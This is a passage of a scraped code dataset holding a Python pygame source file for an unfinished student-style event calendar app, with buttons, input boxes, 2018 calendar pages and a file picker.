os._exit(255)","sub_path":"RNS/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2726,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"289912378","text":"\nfrom InfoSeparatorOne import*\nfrom InfoSeparatorTwo import*\nfrom InfoSeparatorThree import*\nfrom InfoSeparatorFive import*\nfrom InfoSeparatorFour import*\n\nimport os\nimport pygame\n\nos.environ['GOOGLE_APPLICATION_CREDENTIALS'] = 'C:\\\\Users\\\\Diane_HU\\\\Desktop\\\\API_Credential.json'\n\n\n \n\nclass 
PygameGame(object):\n \n # Helpers\n # Init functions\n def initColor(self):\n self.white = (255,255,255)\n self.black= (0,0,0)\n\n #self.deepBlue= (68,118,192)\n #self.darkBlue = (51,87,117)\n self.grey=(99,99,112)\n self.orange=(222,141,71)\n \n self.blueGray = self.hex_to_rgb(\"#343f51\")\n self.deepBlueGray = self.hex_to_rgb(\"#2e3242\")\n self.darkBlueGray = self.hex_to_rgb(\"#1b2331\")\n \n self.lightOrange=(240,190,98)\n self.orange = (255,135,0) #normal\n self.darkOrange = (221,111,15) #motion\n self.deepOrange = self.hex_to_rgb(\"#c16112\") #pressed\n \n def within(self,left,down,width,height,x,y):\n return left < x < left+width and down < y < down +height\n\n def hex_to_rgb(self,value):\n \"\"\"Return (red, green, blue) for the color given as #rrggbb.\"\"\"\n value = value.lstrip('#')\n lv = len(value)\n return tuple(int(value[i:i + lv // 3], 16) for i in range(0, lv, lv // 3))\n \n def loadFont(self):\n self.regularFont = pygame.font.SysFont(\"Arvo-Bold.ttf\",35)\n self.topicFont=pygame.font.SysFont(\"Arvo-Bold.ttf\",60)\n self.buttonFont = pygame.font.SysFont(\"Arvo-Bold.ttf\",30)\n self.calendarFont=pygame.font.SysFont(\"Arvo-Bold.ttf\",25)\n self.weekFont=pygame.font.SysFont(\"Arvo-Bold.ttf\",20)\n self.cuteFont = pygame.font.SysFont(\"EastSeaDokdo-Regular.ttf\",30)\n\n#############################\n#all button\n#############################\n\n def signButtons(self):\n width= 300\n height = 40\n gap = 20\n self.signInBtn = [118,475,width,height, self.orange] \n self.signUpBtn = [118,475+gap+height,width,height,self.orange] \n\n def interestButtons(self):\n gap=10\n btnHeight=35\n self.interestButtonList=[]\n for i in range(0,len(self.interestList)):\n lenText=len(self.interestList[i])\n self.interestButtonList+=InterestBox(43,30+btnHeight*i+gap*i,\\\n lenText*10+20,btnHeight,\\\n self.interestList[i])\n \n def mainButtons(self):\n width=150\n gap=20\n self.mainEvent1=[43,140,450,width,self.white]\n self.mainEvent2=[43,140+width+gap,450,width,self.white]\n self.mainEvent3=[43,140+width*2+gap*2,450,width,self.white]\n self.mainCircle=[self.orange,218,779,70]\n self.mainCommunityBtn=[0,739,188,80,self.orange]\n self.mainCalendarBtn=[348,739,241,80,self.orange]\n \n \n def handButtons(self):\n self.titleInput()\n self.dateInput()\n self.beginTimeInput()\n self.endTimeInput()\n self.locationInput()\n \n \n \n def buttons(self):\n self.interestInput()\n self.signButtons()\n self.interestButtons()\n self.mainButtons()\n self.handButtons()\n self.importButtons=[self.orange,(268,500),200]\n self.friendEventBtn=[118,100,300,200,self.orange]\n self.localEventBtn=[118,350,300,200,self.orange]\n self.preferenceBtn=[118,475,300,40,self.orange]\n self.handCircle=[self.orange,(160,679),40]\n self.libraryInputCircle=[self.orange,(268,639),40]\n self.cameraCircle=[self.orange,(376,679),40]\n \n \n##############################\n#text input boxes\n##############################\n def interestInput(self):\n #text input box at interest input page\n self.interestList=[]\n self.interestInput=\"\"\n boxWidth=450\n boxHeight=35\n self.interestInputBox=[43,150,boxWidth,boxHeight,self.orange]\n \n def titleInput(self):\n self.titleText=\"\"\n boxWidth=450\n boxHeight=35\n self.titleInputBox=[43,150,boxWidth,boxHeight,self.orange]\n \n def dateInput(self):\n self.dateText=\"\"\n boxWidth=200\n boxHeight=35\n self.dateInputBox=[43,245,boxWidth,boxHeight,self.orange]\n \n def beginTimeInput(self):\n self.beginTimeText=\"\"\n boxWidth=100\n boxHeight=35\n 
self.beginTimeInputBox=[43,340,boxWidth,boxHeight,self.orange]\n \n def endTimeInput(self):\n self.endTimeText=\"\"\n boxWidth=100\n boxHeight=35\n self.endTimeInputBox=[158,340,boxWidth,boxHeight,self.orange]\n \n def locationInput(self):\n self.locationText=\"\"\n boxWidth=200\n boxHeight=35\n self.locationInputBox=[43,435,boxWidth,boxHeight,self.orange]\n\n#########################\n### Main Framework ######\n#########################\n def init(self):\n self.mode = \"sign\"\n self.currentPos=(-1,-1)\n self.initColor()\n self.signButtons()\n self.loadFont()\n self.w = 0\n self.h1 = 0\n self.h2 = 0\n self.h3 = 0\n self.h4 = 0\n self.h5 = 0\n self.num = 0\n self.calendarColor = []\n for row in range(5): self.calendarColor += [[1]*7]\n #14 modes \n self.modeLst=[\"sign\",\"interest\",\"main\",\"hand\",\"libraryInput\",\"camera\"\\\n \"calendar\",\"working\",\"finish\",\"calendarYes\",\"calendarNo\",\\\n \"calendarMarch\",\"calendarMay\",\"community\"\\\n \"communityFriends\",\"threeIcon\"]\n self.path = None\n self.buttons()\n self.week = ['Sun','Mon','Tus','Wed','Thr','Fri','Sat']\n self.day = []\n for row in range(5): self.day += [[0]*7]\n self.userImg = pygame.image.load('orange.png')\n self.instaImg = pygame.image.load('instagram.png')\n self.snapImg = pygame.image.load('snapchat1.png')\n self.fbImg = pygame.image.load('fb1.png')\n self.oImg = pygame.image.load('o.png')\n self.friendImg = pygame.image.load('login1.png')\n self.messageImg = pygame.image.load('bubble.png')\n self.backImg = pygame.image.load('back4.png')\n self.addImg = pygame.image.load('add3.png')\n self.doneImg = pygame.image.load('done2.png')\n self.mannualImg = pygame.image.load('manual2.png')\n self.searImg = pygame.image.load('search1.png')\n self.setImg = pygame.image.load('set2.png')\n self.calImg = pygame.image.load('calendar1.png')\n self.comImg = pygame.image.load('community1.png')\n self.camImg = pygame.image.load('camera2.png')\n self.libImg = pygame.image.load('lib1.png')\n self.info=[]\n self.numlist=[]\n self.handInput=[self.titleText,self.dateInput,self.beginTimeText,self.endTimeText,self.locationText]\n \n \n #self.loadLogo() xh\n #self.loadShareLogo() xh\n\n#### MousePressed ####\n def mousePressedSign(self,x,y):\n if self.mode==\"sign\":\n #signInBtn\n surface= self.signInBtn\n if self.within(surface[0],surface[1],surface[2],surface[3],x,y):\n surface[4]=self.deepOrange\n #signUpBtn\n surface=self.signUpBtn\n if self.within(surface[0],surface[1],surface[2],surface[3],x,y):\n surface[4]=self.deepOrange\n \n def mousePressedMain(self,x,y):\n if self.mode==\"main\":\n if (x-268)**2+(y-779)**2<=6400 and y<819:\n self.mainCircle[0]=self.deepOrange\n btn=self.mainCommunityBtn\n if self.within(btn[0],btn[1],btn[2],btn[3],x,y):\n btn[4]=self.deepOrange\n btn=self.mainCalendarBtn\n if self.within(btn[0],btn[1],btn[2],btn[3],x,y):\n btn[4]=self.deepOrange\n \n def mousePressedThreeIcon(self,x,y):\n if self.mode==\"threeIcon\":\n if (x-160)**2+(y-679)**2<=1600:\n self.handCircle[0]=self.deepOrange\n \n if (x-268)**2+(y-639)**2<=1600:\n self.libraryInputCircle[0]=self.deepOrange\n \n if (x-376)**2+(y-679)**2<=1600:\n self.cameraCircle[0]=self.deepOrange\n \n if (x-268)**2+(y-779)**2 <=6400 and y < 819:\n self.mainCircle[0]=self.deepOrange\n \n def mousePressedLibraryInput(self,x,y):\n if self.mode==\"libraryInput\":\n surface=self.importButtons\n if (x-268)**2+(y-500)**2<=200**2:\n surface[1]=self.deepOrange\n \n def mousePressedCommunity(self,x,y):\n if self.mode==\"community\":\n surface=self.friendEventBtn\n 
if self.within(surface[0],surface[1],surface[2],surface[3],x,y):\n surface[4]=self.deepOrange\n \n surface=self.localEventBtn\n if self.within(surface[0],surface[1],surface[2],surface[3],x,y):\n surface[4]=self.deepOrange\n \n\n\n#### Open File Browser ####\n def open_file_browser(self):\n pygame.mixer.init() # initializing the mixer\n import tkinter\n from tkinter import filedialog\n\n root = tkinter.Tk()\n root.withdraw()\n root.filename = filedialog.askopenfilename(initialdir=\"/\", title=\"Select file\",\n filetypes=((\"jpeg files\", \"*.jpg\"), (\"all files\", \"*.*\")))\n return root.filename\n\n#### MouseReleased ####\n def mouseReleasedSign(self,x,y):\n if self.mode==\"sign\":\n #signInBtn\n surface= self.signInBtn\n if self.within(surface[0],surface[1],surface[2],surface[3],x,y):\n surface[4]=self.orange\n self.mode=\"main\"\n #signUpBtn\n surface=self.signUpBtn\n if self.within(surface[0],surface[1],surface[2],surface[3],x,y):\n surface[4]=self.orange\n self.mode=\"interest\"\n \n def mouseReleasedThreeIcon(self,x,y):\n if self.mode==\"threeIcon\":\n if (x-268)**2+(y-779)**2 <=6400 and y < 819:\n self.mode = \"main\"\n print(\"jgso\")\n self.mainCircle[0]=self.orange\n \n elif (x-160)**2+(y-679)**2<=1600:\n self.handCircle[0]=self.orange\n self.mode=\"hand\"\n \n elif (x-268)**2+(y-639)**2<=1600:\n self.libraryInputCircle[0]=self.orange\n self.mode=\"libraryInput\"\n \n elif (x-376)**2+(y-679)**2<=1600:\n self.cameraCircle[0]=self.orange\n\n\n def mouseReleasedMain(self,x,y):\n if self.mode==\"main\":\n if (x-268)**2+(y-779)**2<=6400 and y<819:\n self.mainCircle[0]=self.orange\n self.mode=\"threeIcon\"\n \n btn=self.mainCommunityBtn\n if self.within(btn[0],btn[1],btn[2],btn[3],x,y):\n btn[4]=self.orange\n self.mode=\"community\"\n \n btn=self.mainCalendarBtn\n if self.within(btn[0],btn[1],btn[2],btn[3],x,y):\n btn[4]=self.orange\n self.mode=\"calendar\"\n\n \n def mousePressCalendar(self,x,y):\n if self.mode==\"calendar\":\n for i in range(5):\n for j in range(7):\n if self.within(260-223,40+100-20,100,100,x,y):\n self.mode = \"calendarMarch\"\n elif self.within(720-223-50,40+100-20,100,100,x,y):\n self.mode = \"calendarMay\"\n\n def mousePressedCalendarMarch(self,x,y):\n if self.mode == \"calendarMarch\":\n if self.within(720-223-50,40+100-20,100,100,x,y):\n self.mode = \"calendar\"\n\n def mousePressedCalendarMay(self,x,y):\n if self.mode == \"calendarMay\":\n if self.within(260-223,40+100-20,100,100,x,y):\n self.mode = \"calendar\"\n\n def mousePressedOrange(self,x,y):\n if self.mode == \"working\":\n if self.within(30,600,30+90,600+90,x,y):\n self.numlist.append(1)\n self.num = 1\n elif self.within(130,600,90,90,x,y):\n self.numlist.append(2)\n self.num = 2\n elif self.within(230,600,90,90,x,y):\n self.numlist.append(3)\n self.num = 3\n elif self.within(330,600,90,90,x,y):\n self.numlist.append(4)\n self.num = 4\n elif self.within(430,600,90,90,x,y):\n self.numlist.append(5)\n self.num = 5\n self.extractInfo()\n self.time()\n\n def mousePressed(self,x,y):\n self.mousePressedSign(x,y)\n self.mousePressedLibraryInput(x,y)\n self.mousePressCalendar(x,y)\n self.mousePressedCalendarMarch(x,y)\n self.mousePressedCalendarMay(x,y)\n self.mousePressedCommunity(x,y)\n self.mousePressedThreeIcon(x,y)\n self.mousePressedOrange(x,y)\n self.mousePressedMain(x,y)\n\n def mouseReleasedLibraryInput(self,x,y):\n if self.mode==\"libraryInput\":\n surface=self.importButtons\n if (x-268)**2+(y-500)**2<=200**2:\n surface[1]=self.orange\n self.path=self.open_file_browser()\n if self.path!=\"\":\n 
self.mode=\"working\"\n \n def mouseReleasedBack(self,x,y):\n if self.within(0,0,60,45,x,y):\n if self.mode==\"interest\":\n self.mode=\"sign\"\n elif self.mode==\"libraryInput\":\n self.mode=\"main\"\n elif self.mode==\"camera\":\n self.mode=\"main\"\n elif self.mode==\"hand\":\n self.mode=\"main\"\n elif self.mode==\"community\":\n self.mode=\"main\"\n elif self.mode==\"calendar\":\n self.mode=\"main\"\n elif self.mode==\"calendarYes\":\n self.mode=\"calendar\"\n elif self.mode==\"calendarNo\":\n self.mode=\"calendar\"\n elif self.mode==\"finish\":\n self.mode=\"libraryInput\"\n elif self.mode==\"communityFriends\":\n self.mode=\"community\"\n \n def mouseReleasedDone(self,x,y):\n if self.within(536-60,0,60,45,x,y):\n if self.mode==\"finish\":\n self.mode=\"main\"\n elif self.mode==\"hand\":\n self.mode=\"main\"\n elif self.mode==\"interest\":\n self.mode=\"main\"\n \n \n def mouseReleasedCommunity(self,x,y):\n if self.mode==\"community\":\n surface=self.friendEventBtn\n if self.within(surface[0],surface[1],surface[2],surface[3],x,y):\n surface[4]=self.orange\n self.mode=\"communityFriends\"\n \n surface=self.localEventBtn\n if self.within(surface[0],surface[1],surface[2],surface[3],x,y):\n surface[4]=self.orange\n \n def mouseReleasedCalendar(self,x,y):\n if self.mode == \"calendar\":\n for i in range(5):\n for j in range(7):\n if self.day[i][j] == 0:\n if self.within(250 + j *70-223, 130 + i * 70+100, 60, 60,x,y):\n self.mode = \"calendarNo\"\n elif self.day[i][j] >= 1:\n if self.within(250 + j *70-223, 130 + i * 70+100, 60, 60,x,y):\n self.mode = \"calendarYes\"\n\n def mouseReleased(self,x,y):\n self.mouseReleasedSign(x,y)\n self.mouseReleasedCalendar(x,y)\n self.mouseReleasedLibraryInput(x,y)\n self.mouseReleasedBack(x,y)\n self.mouseReleasedDone(x,y)\n self.mouseReleasedThreeIcon(x,y)\n self.mouseReleasedMain(x,y)\n self.mouseReleasedCommunity(x,y)\n print(self.mode)\n \n#### MouseMotion ####\n def mouseMotionSign(self,x,y):\n if self.mode==\"sign\":\n btn=self.signInBtn\n if self.within(btn[0],btn[1],btn[2],btn[3],x,y):\n btn[4]=self.darkOrange\n else:\n btn[4]=self.orange \n btn=self.signUpBtn\n if self.within(btn[0],btn[1],btn[2],btn[3],x,y):\n btn[4]=self.darkOrange\n else:\n btn[4]=self.orange\n \n\n def mouseMotionInterest(self,x,y):\n if self.mode==\"interest\":\n if len(self.interestButtonList)!=0:\n for btn in self.interestButtonList:\n if self.within(btn[0],btn[1],btn[2],btn[3],x,y):\n btn[4]=self.darkOrange\n else:\n btn[4]=self.orange \n \n def mouseMotionMain(self,x,y):\n if self.mode==\"main\":\n for btn in [self.mainEvent1,self.mainEvent2,self.mainEvent3]:\n if self.within(btn[0],btn[1],btn[2],btn[3],x,y):\n btn[4]=self.darkOrange\n else:\n btn[4]=self.orange \n \n if (x-268)**2+(y-779)**2<=6400 and y<819:\n self.mainCircle[0]=self.darkOrange\n else:\n self.mainCircle[0]=self.orange\n \n btn=self.mainCommunityBtn\n if self.within(btn[0],btn[1],btn[2],btn[3],x,y):\n btn[4]=self.darkOrange\n else:\n btn[4]=self.orange\n \n btn=self.mainCalendarBtn\n if self.within(btn[0],btn[1],btn[2],btn[3],x,y):\n btn[4]=self.darkOrange\n else:\n btn[4]=self.orange\n \n def mouseMotionThreeIcon(self,x,y):\n if self.mode==\"threeIcon\":\n if (x-160)**2+(y-679)**2<=1600:\n self.handCircle[0]=self.darkOrange\n else:\n self.handCircle[0]=self.orange\n \n if (x-268)**2+(y-639)**2<=1600:\n self.libraryInputCircle[0]=self.darkOrange\n else:\n self.libraryInputCircle[0]=self.orange\n \n if (x-376)**2+(y-679)**2<=1600:\n self.cameraCircle[0]=self.darkOrange\n else:\n 
self.cameraCircle[0]=self.orange\n \n if (x-268)**2+(y-779)**2<=6400 and y<819:\n self.mainCircle[0]=self.darkOrange\n else:\n self.mainCircle[0]=self.orange\n \n def mouseMotionLibraryInput(self,x,y):\n if self.mode==\"libraryInput\":\n surface=self.importButtons\n if (x-268)**2+(y-500)**2<=200**2:\n surface[1]=self.darkOrange\n else:\n surface[1]=self.orange\n \n # def mouseMotionFinish(self,x,y):\n # if self.mode==\"finish\":\n \n def mouseMotionCommunity(self,x,y):\n if self.mode==\"community\":\n btn=self.friendEventBtn\n if self.within(btn[0],btn[1],btn[2],btn[3],x,y):\n btn[4]=self.darkOrange\n else:\n btn[4]=self.orange \n \n btn=self.localEventBtn\n if self.within(btn[0],btn[1],btn[2],btn[3],x,y):\n btn[4]=self.darkOrange\n else:\n btn[4]=self.orange \n \n def mouseMotionCalendar(self,x,y):\n if self.mode==\"calendar\":\n for i in range(5):\n for j in range(7):\n if self.within(250 + j *70-223, 130 + i * 70+100, 60, 60,x,y):\n self.calendarColor[i][j] = 1\n else:\n self.calendarColor[i][j] = 0\n \n def mouseMotionPreference(self,x,y):\n if self.mode==\"preference\":\n btn=self.preferenceBtn\n if self.within(btn[0],btn[1],btn[2],btn[3],x,y):\n btn[4]=self.darkOrange\n else:\n btn[4]=self.orange \n\n def mouseMotion(self, x, y):\n self.mouseMotionSign(x,y)\n self.mouseMotionInterest(x,y)\n self.mouseMotionMain(x,y)\n self.mouseMotionLibraryInput(x,y)\n self.mouseMotionCommunity(x,y)\n self.mouseMotionCalendar(x,y)\n self.mouseMotionPreference(x,y)\n self.mouseMotionThreeIcon(x,y)\n\n def keyPressed(self, keyCode, modifier,pos):\n x=pos[0]\n y=pos[1]\n if self.mode==\"hand\":\n if 97<=keyCode<=122:\n addText=chr(keyCode-32)\n else:\n addText=chr(keyCode)\n if 43<=x<=43+450 and 150<=y<=150+35:\n if keyCode==127:\n self.titleText=self.titleText[:-1]\n else:\n self.titleInputBox[4]=self.darkOrange\n self.titleText+=addText\n else:\n self.dateInputBox[4]=self.orange\n \n if 43<=x<=43+200 and 245<= y <=245+35:\n if keyCode==127:\n self.dateText=self.dateText[:-1]\n else:\n self.dateInputBox[4]=self.darkOrange\n self.dateText+=addText\n else:\n self.dateInputBox[4]=self.orange\n \n if 43<=x<=43+100 and 340<= y <=340+35:\n if keyCode==127:\n self.beginTimeText=self.beginTimeText[:-1]\n else:\n self.beginTimeInputBox[4]=self.darkOrange\n self.beginTimeText+=addText\n else:\n self.beginTimeInputBox[4]=self.orange\n \n if 158<=x<=158+100 and 340<=y<=340+35:\n if keyCode==127:\n self.endTimeText=self.endTimeText[:-1]\n else:\n self.endTimeInputBox[4]=self.darkOrange\n self.endTimeText+=addText\n else:\n self.endTimeInputBox[4]=self.orange\n \n if 43<=x<=43+200 and 435<=y<=435+35:\n if keyCode==127:\n self.locationText=self.locationText[:-1]\n else:\n self.locationInputBox[4]=self.darkOrange\n self.locationText+=addText\n else:\n self.locationInputBox[4]=self.orange\n if self.mode==\"interest\":\n if 43<=x<=43+450 and 150<=y<=150+35:\n if 97<=keyCode<=122:\n addText=chr(keyCode-32)\n else:\n addText=chr(keyCode)\n if keyCode !=13:\n if keyCode==127:\n self.interestInput=self.interestInput[:-1]\n else:\n self.interestInputBox[4]=self.darkOrange\n self.interestInput+=addText\n else:\n self.interestList+=[self.interestInput]\n self.interestInput=\"\"\n def getInterestList(self):\n return self.interestList\n \n def drawInputBox(self,screen):\n list=[self.titleInputBox,self.dateInputBox,self.beginTimeInputBox,self.endTimeInputBox,self.locationInputBox]\n for surface in list:\n pygame.draw.rect(screen,surface[4],surface[:4])\n \n def drawInputBoxText(self,screen):\n 
self.displayTextAlignLeft(screen,self.titleText,43,150,\\\n self.black,self.regularFont)\n self.displayTextAlignLeft(screen,self.dateText,43,245,self.black,self.regularFont)\n self.displayTextAlignLeft(screen,self.beginTimeText,43,340,self.black,self.regularFont)\n self.displayTextAlignLeft(screen,self.endTimeText,158,340,self.black,self.regularFont)\n self.displayTextAlignLeft(screen,self.locationText,43,435,self.black,self.regularFont)\n \n def drawInterestInput(self,screen):\n pygame.draw.rect(screen,self.interestInputBox[4],self.interestInputBox[:4])\n self.displayTextAlignLeft(screen,self.interestInput,43,150,self.black,self.regularFont)\n \n def keyReleased(self, keyCode, modifier):\n pass\n \n \n\n\n#### timerFried ####\n\n def timerFired(self, dt):\n if self.mode == \"working\":\n self.orangeTimerFired(dt)\n self.loadTimerFired(dt)\n \n def orangeTimerFired(self,dt):\n if self.num == 1:\n if self.h1 > -100:\n self.h1 -= 10\n elif 0 > self.h1:\n self.h1 += 30\n\n elif self.num == 2:\n if self.h2 < 100:\n self.h2 += 10\n elif 0 < self.h2:\n self.h2 -= 30\n\n elif self.num == 3:\n if self.h3 < 100:\n self.h3 += 10\n elif 0 < self.h3:\n self.h3 -= 30\n\n elif self.num == 4:\n if self.h4 > -100:\n self.h4 -= 10\n elif 0 > self.h4:\n self.h4 += 30\n\n elif self.num == 5:\n if self.h5 < 100:\n self.h5 += 10\n elif 0 < self.h5:\n self.h5 -= 30\n\n \n def loadTimerFired(self,dt):\n if self.w < 350:\n self.w += 1\n if self.w == 350:\n self.mode = \"finish\"\n \n###########################\n#draw\n###########################\n def drawSignButtons(self,screen):\n pygame.draw.rect(screen, self.signInBtn[4], self.signInBtn[:4])\n pygame.draw.rect(screen, self.signUpBtn[4], self.signUpBtn[:4])\n self.displayText(screen,\"Sign In\",118,475,300,40,self.grey,self.regularFont)\n self.displayText(screen,\"Log In\", 118,535,300,40,self.grey,self.regularFont)\n \n #change\n def drawSign(self,screen):\n screen.fill(self.grey)\n screen.blit(self.userImg,(80,70))\n screen.blit(self.fbImg,(125,630))\n screen.blit(self.instaImg,(235.3,630))\n screen.blit(self.snapImg,(344,630))\n\n def drawBackBtn(self,screen):\n screen.blit(self.backImg,(0,0))\n \n def drawAddBtn(self,screen):\n screen.blit(self.addImg, (546,0))\n \n def drawDoneBtn(self,screen):\n screen.blit(self.doneImg, (546,0))\n \n \n # change\n def drawSearchBtn(self,screen,loc):\n screen.blit(self.searImg, loc)\n \n # change\n def drawSettingBtn(self,screen):\n screen.blit(self.setImg, (450,0))\n \n # change\n def drawCalBtn(self,screen):\n screen.blit(self.calImg, (268+50+80,10+739))\n \n # change\n def drawComBtn(self,screen):\n screen.blit(self.comImg, (50+20,739))\n # add\n def drawEventBtn(self,screen,color,loc):\n pygame.draw.rect(screen,color,loc)\n \n def drawText(self,text,screen,a,b,c,d):\n self.displayText(screen,str(\"Title: \"+text[0]),a,b,c,d,self.white,self.regularFont)\n self.displayText(screen,str(\"Date: \"+text[1]),a,b,c,d+50,self.white,self.regularFont)\n self.displayText(screen,str(\"Time: \"+text[2]),a,b,c,d+100,self.white,self.regularFont)\n self.displayText(screen,str(\"Loc: \"+text[3]),a,b,c,d+150,self.white,self.regularFont)\n \n \n \n def drawMainBtn(self,screen):\n pygame.draw.rect(screen,self.mainCommunityBtn[4],(0,739,268,80))\n pygame.draw.rect(screen,self.mainCalendarBtn[4],(268,739,268,80))\n pygame.draw.circle(screen,self.mainCircle[0],(268,779),80)\n\n def drawSubpage(self,screen):\n screen.fill(self.grey)\n self.drawShades(screen,self.white,0,0,self.width,45)\n screen.blit(self.backImg,(10,0))\n \n \n def 
drawShades(self, screen, color, a, b, c, d):\n pygame.draw.rect(screen,(160,160,160),(a-7,b-7,c+14,d+14))\n pygame.draw.rect(screen,(170,170,170),(a-6,b-6,c+12,d+12))\n pygame.draw.rect(screen,(190,190,190),(a-5,b-5,c+10,d+10))\n pygame.draw.rect(screen,(210,210,210),(a-4,b-4,c+8,d+8))\n pygame.draw.rect(screen,(230,230,230),(a-3,b-3,c+6,d+6))\n pygame.draw.rect(screen,(240,240,240),(a-2,b-2,c+4,d+4))\n pygame.draw.rect(screen,(250,250,250),(a-1,b-1,c+2,d+2))\n pygame.draw.rect(screen, color, (a,b,c,d))\n \n def drawCalendarButton(self,screen,color, fontColor, a, b, c, d, text,font, width = 0):\n pygame.draw.rect(screen, color, (a,b,c,d), width)\n myFont = font\n textSurface = myFont.render(text, True, fontColor)\n textRect1 = textSurface.get_rect()\n textRect1.center = (a + c/2, b + d/2)\n screen.blit(textSurface, textRect1)\n \n def drawLeftRightButton(self,screen, color, loc):\n pygame.draw.polygon(screen, color, loc)\n \n def calendarMarch(self,screen):\n self.drawSubpage(screen)\n x = -223\n y = 100\n self.drawCalendarButton(screen,self.grey, self.orange, 250+x, 10+y, 480, 50, \"March, 2018\",self.regularFont)\n self.drawLeftRightButton(screen,self.orange,((260+x,55+y-20),(290+x,40+y-20),(290+x,70+y-20)))\n self.drawLeftRightButton(screen,self.orange,((720+x,55+y-20),(690+x,40+y-20),(690+x,70+y-20)))\n for i in range(7):\n self.drawCalendarButton(screen,self.grey,self.white,250 + i * 70+x, 90+y, 60, 30, self.week[i], self.weekFont)\n day = 29\n for i in range(5):\n for j in range(7):\n if i == 0 and j < 4: continue\n if i ==0 and j == 4:\n day = 1\n self.drawCalendarButton(screen,self.grey, self.orange, 250 + j *70+x, 130 + i * 70+y, 60, 60, str(day), self.calendarFont)\n day += 1\n screen.blit(self.oImg, (80,700))\n \n def calendarApril(self,screen):\n \n self.drawSubpage(screen)\n x = -223\n y = 100\n self.drawCalendarButton(screen,self.grey, self.orange, 250+x, 10+y, 480, 50, \"April, 2018\",self.regularFont)\n self.drawLeftRightButton(screen,self.orange,((260+x,55+y-20),(290+x,40+y-20),(290+x,70+y-20)))\n self.drawLeftRightButton(screen,self.orange,((720+x,55+y-20),(690+x,40+y-20),(690+x,70+y-20)))\n for i in range(7):\n self.drawCalendarButton(screen,self.grey,self.white,250 + i * 70+x, 90+y, 60, 30,self.week[i], self.weekFont)\n \n day = 29\n for i in range(5):\n for j in range(7):\n if i == 4 and j > 2: continue\n if i ==0 and j == 0:\n day = 1\n if self.calendarColor[i][j] == 0 :\n self.drawCalendarButton(screen,self.grey, self.orange, 250 + j *70+x, 130 + i * 70+y, 60, 60, str(day), self.calendarFont)\n elif self.calendarColor[i][j] == 1:\n self.drawCalendarButton(screen,self.grey, self.white, 250 + j *70+x, 130 + i * 70+y, 60, 60, str(day), self.calendarFont)\n day = day + 1\n screen.blit(self.oImg, (80,700))\n \n #if recordMode == 11:\n # pygame.draw.rect(screen, orange, (250+x, 90+y,480 ,380))\n # myfont = pygame.font.SysFont('Comic Sans MS', 30)\n # textSurface = myFont.render(\"Date: Nov.\" + str(self.recordMode) + 'th', True, grey)\n # textRect1 = textSurface.get_rect()\n # textRect1.midleft = (300+x, 150+y)\n # screen.blit(textSurface, textRect1)\n # #Good\n \n # myfont = pygame.font.SysFont('Comic Sans MS', 30)\n # textSurface1 = myFont1.render(\"Condition : \" + \"Fair\", True, grey)\n # textRect2 = textSurface1.get_rect()\n # textRect2.midleft = (300+x, 200+y)\n # screen.blit(textSurface1, textRect2)\n \n def calendarMay(self,screen):\n self.drawSubpage(screen)\n x = -223\n y = 100\n self.drawCalendarButton(screen,self.grey, self.orange, 250+x, 10+y, 480, 50, \"May, 
2018\", self.regularFont)\n self.drawLeftRightButton(screen,self.orange,((260+x,55+y-20),(290+x,40+y-20),(290+x,70+y-20)))\n self.drawLeftRightButton(screen,self.orange,((720+x,55+y-20),(690+x,40+y-20),(690+x,70+y-20)))\n for i in range(7):\n self.drawCalendarButton(screen,self.grey,self.white,250 + i * 70+x, 90+y, 60, 30, self.week[i], self.weekFont)\n \n day = 29\n for i in range(5):\n for j in range(7):\n if i == 0 and j < 2 or i == 4 and j > 4: continue\n if i ==0 and j == 2:\n day = 1\n self.drawCalendarButton(screen,self.grey, self.orange, 250 + j *70+x, 130 + i * 70+y, 60, 60, str(day), self.calendarFont)\n day = day + 1\n screen.blit(self.oImg, (80,700))\n \n \n def drawCommunityFriends(self,screen):\n self.drawSubpage(screen)\n screen.blit(self.friendImg,(20,180))\n screen.blit(self.friendImg,(20,380))\n screen.blit(self.friendImg,(20,580))\n screen.blit(self.messageImg, (140,150))\n screen.blit(self.messageImg, (140,350))\n screen.blit(self.messageImg, (140,550))\n \n def time(self):\n if len(self.gateDate())>2:\n date=self.gateDate()[1]\n i=date//7+1\n j=date-i*7\n self.day[i][j] += 1\n elif len(self.getDate()) == 2:\n for c in self.getDate():\n date = c[1]\n i = date//7+1\n j = date-i*7\n self.day[i][j] += 1\n \n \n def redrawCalendarYes(self,screen):\n if self.mode == \"calendarYes\":\n self.calendarYes(screen)\n drawText(self,[\"THE REVOLUTION\",\"APRIL 27\",\"\",\"FT.LAUDERDALE,FLORIDA\"],screen,self.mainEvent1[0],self.mainEvent1[1])\n if len(getDate) > 2:\n self.drawEventBtn(screen,self.mainEven2[4],self.mainEvent2[:4])\n self.drawText(self,[self.getDate()[0],self.getDate()[1],self.getDate()[3],self.getDate()[2]],screen,self.mainEvent2[0],self.mainEvent2[1])\n else:\n self.drawEventBtn(screen,self.mainEven2[4],self.mainEvent2[:4])\n self.drawText(self,[self.getDate()[0],self.getDate()[1],self.getDate()[3],self.getDate()[2]],screen,self.mainEvent2[0],self.mainEvent2[1])\n self.drawEventBtn(screen,self.mainEven3[4],self.mainEvent3[:4])\n self.drawText(self,[self.getDate()[0],self.getDate()[1],self.getDate()[3],self.getDate()[2]],screen,self.mainEvent3[0],self.mainEvent3[1])\n \n def calendarNo(self,screen):\n self.drawSubpage(screen)\n x = -223\n y = 150\n yw = 0\n for i in range(7):\n self.drawCalendarButton(screen,self.grey,self.orange,250 + i * 70+x, 90+yw, 60, 30, self.week[i], self.weekFont)\n self.drawCalendarButton(screen,self.grey, self.orange, 250+x, 10+y, 480, 50,\"April 11, 2018\", self.regularFont)\n self.drawLeftRightButton(screen,self.orange,((260+x,55+y-20),(290+x,40+y-20),(290+x,70+y-20)))\n self.drawLeftRightButton(screen,self.orange,((720+x,55+y-20),(690+x,40+y-20),(690+x,70+y-20)))\n screen.blit(self.oImg,(170, 500))\n self.displayText(screen,'\"An Orange A Day',20,150,500,500,self.orange,self.cuteFont)\n self.displayText(screen,' Keeps Doctors Away\"',20,220,500,500,self.black,self.cuteFont)\n \n def displayText(self,screen,text,a,b,c,d,fontColor,font):\n myFont = font\n textSurface = myFont.render(text, True, fontColor)\n textRect1 = textSurface.get_rect()\n textRect1.center = (a + c/2, b + d/2)\n screen.blit(textSurface, textRect1)\n \n def displayTextAlignLeft(self,screen,text,a,b,fontColor,font):\n print(self.interestList)\n textSurface=font.render(text,True,fontColor)\n 